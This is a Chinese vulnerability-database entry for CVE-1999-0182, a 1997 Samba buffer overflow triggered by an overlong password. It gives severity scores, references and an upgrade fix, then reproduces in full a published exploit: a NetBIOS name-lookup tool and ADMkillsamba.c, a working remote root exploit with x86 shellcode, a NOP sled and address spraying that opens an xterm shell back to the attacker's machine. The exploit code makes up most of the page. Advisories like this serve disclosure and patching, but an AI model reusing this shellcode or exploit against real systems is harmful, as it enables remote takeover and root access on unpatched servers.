CVE-1999-0182
CVSS10.0
发布时间 :1997-09-30 00:00:00
修订时间 :2008-09-09 08:33:54
NMCOE    

[原文]Samba has a buffer overflow which allows a remote attacker to obtain root access by specifying a long password.


[CNNVD]Samba权限许可和访问控制漏洞(CNNVD-199709-019)

        Samba存在缓冲区溢出漏洞。远程攻击者可以借助规格化一个长密码获取根访问权限。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0182
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0182
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199709-019
(官方数据源) CNNVD

- 其它链接及资源

http://www.ciac.org/ciac/bulletins/h-110.shtml
(UNKNOWN)  CIAC  H-110

- 漏洞信息

Samba权限许可和访问控制漏洞
危急 缓冲区溢出
1997-09-30 00:00:00 2005-05-02 00:00:00
远程  
        Samba存在缓冲区溢出漏洞。远程攻击者可以借助规格化一个长密码获取根访问权限。

- 公告与补丁

        

- 漏洞信息 (20308)

Samba 1.9.19 Long Password Buffer Overflow Vulnerability (EDBID:20308)
linux remote
1997-09-25 Verified
0 root@adm.kix-azz.org
N/A [点击下载]
source: http://www.securityfocus.com/bid/1816/info

Samba is an open source software suite that provides seamless file and print services to SMB/CIFS clients. Certain older versions of Samba had a remotely exploitable buffer overflow vulnerability. This vulnerability was in the password function of the authentication mechanism which is to say a user could supply an overly long password to the Samba server and trigger a buffer overflow.

*/

/* Note i have include a little utility pinched from ADMtoolz
 for get the netbios name

  --------------------------------------------------------------------------
------------------------------[ADMnmbname.c]----------------------------------
  --------------------------------------------------------------------------  */


#define DEFAULT_OFFSET 3500
#define DEFAULT_BUFFER_SIZE 3081
#define NOP 0x90
#define NMBHDRSIZE 13
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/ip_tcp.h>

struct nmbhdr {
unsigned short int id;

unsigned char  R:1;
unsigned char  opcode:4;
unsigned char  AA:1;
unsigned char  TC:1;
unsigned char  RD:1;
unsigned char  RA:1;
unsigned char  unless:2;
unsigned char  B:1;
unsigned char  RCODE:4;


unsigned short int que_num;
unsigned short int rep_num;
unsigned short int num_rr;
unsigned short int num_rrsup;
unsigned char namelen;
};


struct typez{
u_int type;
u_int type2;
};


unsigned int host2ip(char *serv)
{
struct sockaddr_in sin;
struct hostent *hent;

hent=gethostbyname(serv);
if(hent == NULL) return 0;
bzero((char *)&sin, sizeof(sin));
bcopy(hent->h_addr, (char *)&sin.sin_addr, hent->h_length);
return sin.sin_addr.s_addr;
}



main( int argc, char  **argv)
{
struct sockaddr_in  sin_me , sin_dst;
struct nmbhdr *nmb,*nmb2;
struct iphdr *ipz;
struct typez  *typz;
struct hostent *hent;
int socket_client,sr,num,i=1,bha,timeout=0,try=0,GO=0;
int longueur=sizeof(struct sockaddr_in);
char  *data;
char  *dataz;
char   buffer[1024];
char   buffer2[1024];
char   namezz[1024];
char   name[64]="CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0";
char   c;

if(argc <2) {
        printf("usage: ADMnmbname <ip of the victim>\n");
        exit (0);
        }


socket_client=socket(AF_INET,SOCK_DGRAM,17);
sr=socket(AF_INET,SOCK_RAW,17);
ioctl(sr,FIONBIO,&i);


sin_me.sin_family=AF_INET;
sin_me.sin_addr.s_addr=htonl(INADDR_ANY);
sin_me.sin_port=htons(2600);

sin_dst.sin_family=AF_INET;
sin_dst.sin_port=htons(137);
sin_dst.sin_addr.s_addr = host2ip(argv[1]);

nmb = (struct nmbhdr *)  buffer;
data = (char *)(buffer+NMBHDRSIZE);
typz = (struct typez *)(buffer+NMBHDRSIZE+33);
nmb2 = (struct nmbhdr *)(buffer2+20+8);
ipz   = (struct iphdr *)buffer2;
dataz = (char *)(buffer2+50+7+20+8);

memset(buffer,0,1024);
memset(buffer2,0,1024);
memset(namezz,0,1024);
memcpy(data,name,33);

           /* play with the netbios query format :) */

nmb->id=0x003;
nmb->R=0;                  /* 0 for question 1 for response */
nmb->opcode=0;             /* 0 = query */
nmb->que_num=htons(1);     /* i have only 1 question :) */
nmb->namelen=0x20;
typz->type=0x2100;
typz->type2=0x1000;

sendto(socket_client,buffer,50,0,(struct sockaddr *)&sin_dst,longueur);



  for(timeout=0;timeout<90;timeout++ )
  {
           usleep(100000);
           buffer2[0]='0';
           recvfrom(sr,buffer2,800,0,(struct sockaddr *)&sin_dst,&(int)longueur);

        if(buffer2[0]!='0')
                {



                          if(nmb2->rep_num!=0)
                            {
                            bha=0;

                                     for(;;)
                                     {

                                        c=*(dataz+bha);
                                        if(c!='\x20')
                                                        {

                                                        namezz[bha]=c;
                                                        bha++;
                                                         }
                                        if(c=='\x20')break;
                                   }


                                printf("netbios name of %s is %s\n",argv[1],namezz);
                                try =4;
                                GO = 4;

                                break;
                              }
                }


     }




memset(buffer,0,1024);
memset(buffer2,0,1024);

}

/*
 ---------------------------------------------------------------------------
----------------------------[ADMkillsamba.c]---------------------------------
 ---------------------------------------------------------------------------

         generic buffer overflow ameliored for samba sploit
 the sploit send a xterm to your machine .
 hey dont forget to do a  xhost +IP-OF-VICTIM  !!!!
 and put the the sploit to the same directory of  the special smbclient !

 */


/* diz default offset and buffer size Work fine on a my system Redhat 4.2  with samba server

1.9.17alpha5 < the last version !> i have tested on other system with this deffautl buff & size

smb 1.9.16p[9-11] the default srv on redhat 4.1 4.2  but somtime you need to change the

buffer size and offset   try a buffer of ( 1050<buffer >1100) and a offset ( 1500<off >2500)

mail me at admsmb@hotmail.com if u wanna some help */





#define DEFAULT_OFFSET 3500
#define DEFAULT_BUFFER_SIZE 3081
#define NOP 0x90
#include <stdlib.h>
#include <strings.h>

unsigned char shellcode[500] =

"\xeb\x2f\x5f\xeb\x4a\x5e\x89\xfb\x89\x3e\x89\xf2\xb0\xfe\xae\x74"
"\x14\x46\x46\x46\x46\x4f\x31\xc9\x49\xb0\xff\xf2\xae\x30\xc0\x4f"
"\xaa\x89\x3e\xeb\xe7\x31\xc0\x89\x06\x89\xd1\x31\xd2\xb0\x0b\xcd"
"\x80\xe8\xcc\xff\xff\xff";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  char netbios_name[100];

  char bufferz[255];
  char ipz[40];
  char myipz[40];
  unsigned char bla[50] = "\xfe\xe8\xb1\xff\xff\xff";
  int *ret;
  unsigned char cmd[50]="/usr/bin/X11/xterm\xff-display\xff";
  unsigned char arg1[50];
  char arg2[50]="bhahah\xff";


  int i,pid;

  bzero(netbios_name,100);
  bzero(bufferz,255);
  bzero(ipz,40);
  bzero(ipz,40);

  if(argc <4){
  printf(" usage: ADMkillsamba <ip of the victim> <netbios name> <your ip> [buff size] [offset size]\n");
  printf("<ip of victim> = 11.11.11.11  ! THe numerical IP  Only ! not www.xxx.cc !\n");
  printf("<netbios name> = VICTIME    for get the netbios name use ADMnmbname or ADMhack\n");
  printf("<your ip> = the sploit send a xterm to your machine heh \n");
  printf("option:\n");
  printf("[buff size] = the size of the buffer to send default is 3081 try +1 -1 to a plage of +10 -10\n");
  printf("[offset size] = the size of the offset default is 3500 try +50 -50 to a plage of 1000 -1000\n");
  printf(" HaVe Fun\n");
  exit(0);
  }

    sprintf(arg1,"%s:0\xff-e\xff/bin/sh\xff",argv[3]);

    shellcode[4] =(unsigned char)0x32+strlen(cmd)+strlen(arg1);
    bla[2] =(unsigned char) 0xc9-strlen(cmd)-strlen(arg1);

 printf("4 byte = 0x%x\n",shellcode[4]);
 printf("5 byte = 0x%x\n",bla[2]);

  strcat(shellcode,cmd);
  strcat(shellcode,arg1);
  strcat(shellcode,bla);
  strcat(shellcode,"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx");

//  printf("%s\n",shellcode);

  strcpy(ipz,argv[1]);                   /* haha u can overflow my sploit :) */
  strcpy(netbios_name,argv[2]);


  if (argc > 4) bsize  = atoi(argv[4]);
  if (argc > 5) offset = atoi(argv[5]);

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

sprintf(bufferz,"\\\\\\\\%s\\\\IPC$",netbios_name);


  addr =  0xbffffff0 - offset ;
  printf("Using address: 0x%x\n", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  for (i = 0; i < bsize/4; i++)
    buff[i] = NOP;

  ptr = buff + ((bsize/4) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';

  execl("./smbclient","smbclient",bufferz,buff,"-I",ipz,NULL);



 }		

- 漏洞信息

11521
Samba Password Field Handling Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A remote overflow exists in Samba. The NetBIOS service fails to validate the user-supplied password string resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

1997-09-01 Unknow
1997-09-01 Unknow

- 解决方案

Upgrade to version 1.9.17p2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站